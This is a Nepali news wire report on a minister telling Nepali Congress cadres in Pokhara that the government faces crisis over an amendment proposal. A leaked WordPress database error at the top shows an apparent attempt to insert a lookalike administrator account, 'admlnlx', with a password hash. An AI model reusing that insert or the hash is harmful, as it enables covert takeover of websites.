WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$ByOdNQEIX7xZy1YfZZ0Pg9Lb8bDE5k.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 23:10:37', '', 'admlnlx', 'admlnlx')
पोखरा, मंसिर २३ –
संस्कृति, पर्यटन तथा नागरिक उड्डयन मन्त्री जीवनबहादुर शाहीले सरकार सङ्कटमा परेको बताउनुभएको छ ।
नेपाली काँग्रेस कास्कीद्वारा आज यहाँ आयोजित कार्यकर्ता भेटघाट कार्यक्रममा बोल्दै उहाँले संशोधन प्रस्तावको विषयले समस्या परेको बताउनुभयो ।
“संशोधनले कमसेकम एउटा पक्ष खुसी बन्नु पथ्र्यो”, उहाँले भन्नुभयो – “संशोधनबाट आन्दोलनरत पक्ष पनि सन्तुष्ट छैनन्, सत्तारुढ दलकै कार्यकर्ता पनि असन्तुष्ट छन् ।”
प्रदेश नं ५ मा देखिएको समस्यालाई सुधार हुनेसम्म सुधार गरी लैजानुपर्नेमा उहाँको जोड थियो ।
नेपाली काँग्रेसले समयसापेक्ष नेपाली जनताको भावनालाई आत्मसात् गर्दै अघि बढ्नुपर्ने बताउँदै उहाँले पार्टीले गरेका राम्रा काम पनि प्रचार हुन नसकेको उल्लेख गर्नुभयो ।
पोखरा विमानस्थलको निर्माण प्रक्रिया केही प्राविधिक कारणबाट ढिलो भए पनि काम अघि बढ्ने उहाँले बताउनुभयो ।
नेपाली काँग्रेस कास्कीका सभापति कृष्ण केसीले काँग्रेस सरकारमा रहेको वर्तमान अवस्थामा जनतामुखी कार्यक्रमका साथ अघि बढ्नु आवश्यक भएको विचार व्यक्त गर्नु भयो ।
कार्यक्रममा सांसदद्वय यज्ञबहादुर थापा, शारदा पौडेललगायत पार्टीका नेता तथा कार्यकर्ता सहभागी हुनुहुन्थ्यो । – रासस